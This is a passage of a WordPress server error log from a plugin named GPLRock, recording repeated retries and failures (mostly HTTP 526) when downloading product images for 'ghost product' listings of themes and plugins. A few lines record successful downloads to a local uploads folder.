UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dentamedi---dentist--dental-clinic-wordpress-theme-5034.webp for product dentamedi-dentist-dental-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:03 UTC] GPLRock: Image download failed for product dentamedi-dentist-dental-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:05 UTC] GPLRock: Image download failed for product dentamedi-dentist-dental-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dentamedi---dentist--dental-clinic-wordpress-theme-5034.webp for product dentamedi-dentist-dental-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:07 UTC] GPLRock WARNING: Image download failed for product dentamedi-dentist-dental-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dentamedi---dentist--dental-clinic-wordpress-theme-5034.webp [05-Apr-2026 00:59:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dentamedi-dentist-dental-clinic-wordpress-theme [05-Apr-2026 00:59:07 UTC] GPLRock: Image download failed for product minipo-multipurpose-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:10 UTC] GPLRock: Image download failed for product minipo-multipurpose-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minipo---multipurpose-minimal-portfolio-wordpress-theme-28024.webp for product minipo-multipurpose-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:12 UTC] GPLRock: Image download failed for product minipo-multipurpose-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:14 UTC] GPLRock: Image download failed for product minipo-multipurpose-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minipo---multipurpose-minimal-portfolio-wordpress-theme-28024.webp for product minipo-multipurpose-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:16 UTC] GPLRock WARNING: Image download failed for product minipo-multipurpose-minimal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/minipo---multipurpose-minimal-portfolio-wordpress-theme-28024.webp [05-Apr-2026 00:59:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: minipo-multipurpose-minimal-portfolio-wordpress-theme [05-Apr-2026 00:59:16 UTC] GPLRock: Image download failed for product rebirth-freelance-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:18 UTC] GPLRock: Image download failed for product rebirth-freelance-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rebirth---freelance--agency-portfolio-wordpress-theme-9532.webp for product rebirth-freelance-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:20 UTC] GPLRock: Image download failed for product rebirth-freelance-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:22 UTC] GPLRock: Image download failed for product rebirth-freelance-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rebirth---freelance--agency-portfolio-wordpress-theme-9532.webp for product rebirth-freelance-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:25 UTC] GPLRock WARNING: Image download failed for product rebirth-freelance-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rebirth---freelance--agency-portfolio-wordpress-theme-9532.webp [05-Apr-2026 00:59:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rebirth-freelance-agency-portfolio-wordpress-theme [05-Apr-2026 00:59:25 UTC] GPLRock: Image download failed for product barberia-salon-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:27 UTC] GPLRock: Image download failed for product barberia-salon-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/barberia--salon-responsive-wordpress-theme-31233.webp for product barberia-salon-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:29 UTC] GPLRock: Image download failed for product barberia-salon-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:31 UTC] GPLRock: Image download failed for product barberia-salon-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/barberia--salon-responsive-wordpress-theme-31233.webp for product barberia-salon-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:33 UTC] GPLRock WARNING: Image download failed for product barberia-salon-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/barberia--salon-responsive-wordpress-theme-31233.webp [05-Apr-2026 00:59:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: barberia-salon-responsive-wordpress-theme [05-Apr-2026 00:59:33 UTC] GPLRock: Image download failed for product furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:35 UTC] GPLRock: Image download failed for product furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/furnicom---furniture-store--interior-design-wordpress-woocommerce-theme-10-homep-3660.webp for product furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:38 UTC] GPLRock: Image download failed for product furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:40 UTC] GPLRock: Image download failed for product furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/furnicom---furniture-store--interior-design-wordpress-woocommerce-theme-10-homep-3660.webp for product furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:42 UTC] GPLRock WARNING: Image download failed for product furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready. URL: https://meldwp.com/wp-content/uploads/furnicom---furniture-store--interior-design-wordpress-woocommerce-theme-10-homep-3660.webp [05-Apr-2026 00:59:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: furnicom-furniture-store-interior-design-wordpress-woocommerce-theme-10-homepages-ready [05-Apr-2026 00:59:42 UTC] GPLRock: Image download failed for product wandau-art-history-museum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:44 UTC] GPLRock: Image download failed for product wandau-art-history-museum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wandau--art--history-museum-wordpress-theme-33155.webp for product wandau-art-history-museum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:46 UTC] GPLRock: Image download failed for product wandau-art-history-museum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:49 UTC] GPLRock: Image download failed for product wandau-art-history-museum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wandau--art--history-museum-wordpress-theme-33155.webp for product wandau-art-history-museum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:51 UTC] GPLRock WARNING: Image download failed for product wandau-art-history-museum-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wandau--art--history-museum-wordpress-theme-33155.webp [05-Apr-2026 00:59:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wandau-art-history-museum-wordpress-theme [05-Apr-2026 00:59:51 UTC] GPLRock: Image download failed for product hotlock-locksmith-security-systems-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:53 UTC] GPLRock: Image download failed for product hotlock-locksmith-security-systems-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotlock--locksmith--security-systems-wordpress-theme--rtl-10735.webp for product hotlock-locksmith-security-systems-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:55 UTC] GPLRock: Image download failed for product hotlock-locksmith-security-systems-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:57 UTC] GPLRock: Image download failed for product hotlock-locksmith-security-systems-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotlock--locksmith--security-systems-wordpress-theme--rtl-10735.webp for product hotlock-locksmith-security-systems-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:59:59 UTC] GPLRock WARNING: Image download failed for product hotlock-locksmith-security-systems-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/hotlock--locksmith--security-systems-wordpress-theme--rtl-10735.webp [05-Apr-2026 00:59:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotlock-locksmith-security-systems-wordpress-theme-rtl [05-Apr-2026 00:59:59 UTC] GPLRock: Image download failed for product abstrak-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:02 UTC] GPLRock: Image download failed for product abstrak-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/abstrak---agency--portfolio-wordpress-theme-8712.webp for product abstrak-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 521, Error: [05-Apr-2026 01:00:04 UTC] GPLRock: Image download failed for product abstrak-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 521, Error: . Retrying... [05-Apr-2026 01:00:06 UTC] GPLRock: Image download failed for product abstrak-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 521, Error: . Retrying... [05-Apr-2026 01:00:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/abstrak---agency--portfolio-wordpress-theme-8712.webp for product abstrak-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:00:08 UTC] GPLRock WARNING: Image download failed for product abstrak-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/abstrak---agency--portfolio-wordpress-theme-8712.webp [05-Apr-2026 01:00:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: abstrak-agency-portfolio-wordpress-theme [05-Apr-2026 01:00:08 UTC] GPLRock: Image download failed for product oscend-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:10 UTC] GPLRock: Image download failed for product oscend-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oscend---creative-agency-wordpress-theme-26932.webp for product oscend-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:00:12 UTC] GPLRock: Image download failed for product oscend-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:14 UTC] GPLRock: Image download failed for product oscend-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oscend---creative-agency-wordpress-theme-26932.webp for product oscend-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:00:17 UTC] GPLRock WARNING: Image download failed for product oscend-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oscend---creative-agency-wordpress-theme-26932.webp [05-Apr-2026 01:00:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oscend-creative-agency-wordpress-theme [05-Apr-2026 01:00:17 UTC] GPLRock: Image download failed for product argo-training-course-wordpress-landing-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:19 UTC] GPLRock: Image download failed for product argo-training-course-wordpress-landing-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/argo---training-course-wordpress-landing-page-theme-19495.webp for product argo-training-course-wordpress-landing-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:00:21 UTC] GPLRock: Image download failed for product argo-training-course-wordpress-landing-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:23 UTC] GPLRock: Image download failed for product argo-training-course-wordpress-landing-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:00:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/argo---training-course-wordpress-landing-page-theme-19495.webp for product argo-training-course-wordpress-landing-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:00:25 UTC] GPLRock WARNING: Image download failed for product argo-training-course-wordpress-landing-page-theme. URL: https://meldwp.com/wp-content/uploads/argo---training-course-wordpress-landing-page-theme-19495.webp [05-Apr-2026 01:00:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: argo-training-course-wordpress-landing-page-theme [05-Apr-2026 01:00:57 UTC] GPLRock: Image downloaded successfully for product ultimate-member-mycred (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05b52229.jpg [05-Apr-2026 01:00:57 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-mycred: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05b52229.jpg [05-Apr-2026 01:00:57 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-mycred [05-Apr-2026 01:01:00 UTC] GPLRock: Image download failed for product divilife-divi-mega-pro (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 01:01:04 UTC] GPLRock: Image download failed for product divilife-divi-mega-pro (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 01:01:10 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/DiviLife-Divi-Mega-Pro.jpg for product divilife-divi-mega-pro after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 01:01:13 UTC] GPLRock: Image download failed for product divilife-divi-mega-pro (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 01:01:17 UTC] GPLRock: Image download failed for product divilife-divi-mega-pro (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 01:01:21 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/DiviLife-Divi-Mega-Pro.jpg for product divilife-divi-mega-pro after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 01:01:21 UTC] GPLRock WARNING: Image download failed for product divilife-divi-mega-pro. URL: https://www.gplrock.com/wp-content/uploads/2021/09/DiviLife-Divi-Mega-Pro.jpg [05-Apr-2026 01:01:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: divilife-divi-mega-pro [05-Apr-2026 01:01:22 UTC] GPLRock: Image downloaded successfully for product multipurpose-before-after-slider (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df8bf108.jpg [05-Apr-2026 01:01:22 UTC] GPLRock: Using pre-downloaded image for product multipurpose-before-after-slider: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df8bf108.jpg [05-Apr-2026 01:01:22 UTC] GPLRock: Ghost product published with image - Product ID: multipurpose-before-after-slider [05-Apr-2026 01:01:24 UTC] GPLRock: Image downloaded successfully for product thrive-intranet-community-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c5ab05a.jpg [05-Apr-2026 01:01:24 UTC] GPLRock: Using pre-downloaded image for product thrive-intranet-community-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c5ab05a.jpg [05-Apr-2026 01:01:24 UTC] GPLRock: Ghost product published with image - Product ID: thrive-intranet-community-wordpress-theme [05-Apr-2026 01:01:26 UTC] GPLRock: Image downloaded successfully for product techmarket-multi-demo-electronics-store-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b088b9b.jpg [05-Apr-2026 01:01:26 UTC] GPLRock: Using pre-downloaded image for product techmarket-multi-demo-electronics-store-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b088b9b.jpg [05-Apr-2026 01:01:26 UTC] GPLRock: Ghost product published with image - Product ID: techmarket-multi-demo-electronics-store-woocommerce-theme [05-Apr-2026 01:01:28 UTC] GPLRock: Image downloaded successfully for product studiopress-authority-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f9581e4.jpg [05-Apr-2026 01:01:28 UTC] GPLRock: Using pre-downloaded image for product studiopress-authority-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f9581e4.jpg [05-Apr-2026 01:01:28 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-authority-pro-genesis-wordpress-theme [05-Apr-2026 01:01:29 UTC] GPLRock: Image downloaded successfully for product olam-easy-digital-downloads-marketplace-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78c6dd9c.avif [05-Apr-2026 01:01:29 UTC] GPLRock: Using pre-downloaded image for product olam-easy-digital-downloads-marketplace-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78c6dd9c.avif [05-Apr-2026 01:01:29 UTC] GPLRock: Ghost product published with image - Product ID: olam-easy-digital-downloads-marketplace-wordpress-theme [05-Apr-2026 01:01:31 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-reviews-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31f24c4b.jpg [05-Apr-2026 01:01:31 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-reviews-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31f24c4b.jpg [05-Apr-2026 01:01:31 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-reviews-pro [05-Apr-2026 01:01:32 UTC] GPLRock: Image downloaded successfully for product real-spaces-wordpress-real-estate-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13bf062d.jpg [05-Apr-2026 01:01:32 UTC] GPLRock: Using pre-downloaded image for product real-spaces-wordpress-real-estate-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13bf062d.jpg [05-Apr-2026 01:01:32 UTC] GPLRock: Ghost product published with image - Product ID: real-spaces-wordpress-real-estate-theme [05-Apr-2026 01:01:34 UTC] GPLRock: Image downloaded successfully for product popup-maker-scheduling (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9a13e74.jpg [05-Apr-2026 01:01:34 UTC] GPLRock: Using pre-downloaded image for product popup-maker-scheduling: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9a13e74.jpg [05-Apr-2026 01:01:34 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-scheduling [05-Apr-2026 01:03:00 UTC] GPLRock: Image download failed for product travol-travel-agency-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:02 UTC] GPLRock: Image download failed for product travol-travel-agency-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travol--travel-agency-elementor-wordpress-theme-12845.webp for product travol-travel-agency-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:04 UTC] GPLRock: Image download failed for product travol-travel-agency-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:06 UTC] GPLRock: Image download failed for product travol-travel-agency-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travol--travel-agency-elementor-wordpress-theme-12845.webp for product travol-travel-agency-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:08 UTC] GPLRock WARNING: Image download failed for product travol-travel-agency-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/travol--travel-agency-elementor-wordpress-theme-12845.webp [05-Apr-2026 01:03:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travol-travel-agency-elementor-wordpress-theme [05-Apr-2026 01:03:08 UTC] GPLRock: Image download failed for product ovation-wedding-event-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:11 UTC] GPLRock: Image download failed for product ovation-wedding-event-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ovation---wedding--event-photography-wordpress-theme-256.webp for product ovation-wedding-event-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:13 UTC] GPLRock: Image download failed for product ovation-wedding-event-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:15 UTC] GPLRock: Image download failed for product ovation-wedding-event-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ovation---wedding--event-photography-wordpress-theme-256.webp for product ovation-wedding-event-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:17 UTC] GPLRock WARNING: Image download failed for product ovation-wedding-event-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ovation---wedding--event-photography-wordpress-theme-256.webp [05-Apr-2026 01:03:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ovation-wedding-event-photography-wordpress-theme [05-Apr-2026 01:03:17 UTC] GPLRock: Image download failed for product law-advisom-lawyers-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:19 UTC] GPLRock: Image download failed for product law-advisom-lawyers-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/law-advisom--lawyers--attorney-wordpress-theme-25906.webp for product law-advisom-lawyers-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:21 UTC] GPLRock: Image download failed for product law-advisom-lawyers-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:23 UTC] GPLRock: Image download failed for product law-advisom-lawyers-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/law-advisom--lawyers--attorney-wordpress-theme-25906.webp for product law-advisom-lawyers-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:26 UTC] GPLRock WARNING: Image download failed for product law-advisom-lawyers-attorney-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/law-advisom--lawyers--attorney-wordpress-theme-25906.webp [05-Apr-2026 01:03:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: law-advisom-lawyers-attorney-wordpress-theme [05-Apr-2026 01:03:26 UTC] GPLRock: Image download failed for product reframe-resume-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:28 UTC] GPLRock: Image download failed for product reframe-resume-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reframe---resume--personal-portfolio-wordpress-theme-7538.webp for product reframe-resume-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:30 UTC] GPLRock: Image download failed for product reframe-resume-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:32 UTC] GPLRock: Image download failed for product reframe-resume-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reframe---resume--personal-portfolio-wordpress-theme-7538.webp for product reframe-resume-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:34 UTC] GPLRock WARNING: Image download failed for product reframe-resume-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/reframe---resume--personal-portfolio-wordpress-theme-7538.webp [05-Apr-2026 01:03:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: reframe-resume-personal-portfolio-wordpress-theme [05-Apr-2026 01:03:34 UTC] GPLRock: Image download failed for product jono-responsive-wordpress-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:36 UTC] GPLRock: Image download failed for product jono-responsive-wordpress-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jono-responsive-wordpress-magazine-theme-896.webp for product jono-responsive-wordpress-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:39 UTC] GPLRock: Image download failed for product jono-responsive-wordpress-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:41 UTC] GPLRock: Image download failed for product jono-responsive-wordpress-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jono-responsive-wordpress-magazine-theme-896.webp for product jono-responsive-wordpress-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:43 UTC] GPLRock WARNING: Image download failed for product jono-responsive-wordpress-magazine-theme. URL: https://meldwp.com/wp-content/uploads/jono-responsive-wordpress-magazine-theme-896.webp [05-Apr-2026 01:03:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jono-responsive-wordpress-magazine-theme [05-Apr-2026 01:03:43 UTC] GPLRock: Image download failed for product biolife-organic-food-wordpress-theme-rtl-supported (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:45 UTC] GPLRock: Image download failed for product biolife-organic-food-wordpress-theme-rtl-supported (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/biolife---organic-food-wordpress-theme--rtl-supported--11853.webp for product biolife-organic-food-wordpress-theme-rtl-supported after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:47 UTC] GPLRock: Image download failed for product biolife-organic-food-wordpress-theme-rtl-supported (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:49 UTC] GPLRock: Image download failed for product biolife-organic-food-wordpress-theme-rtl-supported (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 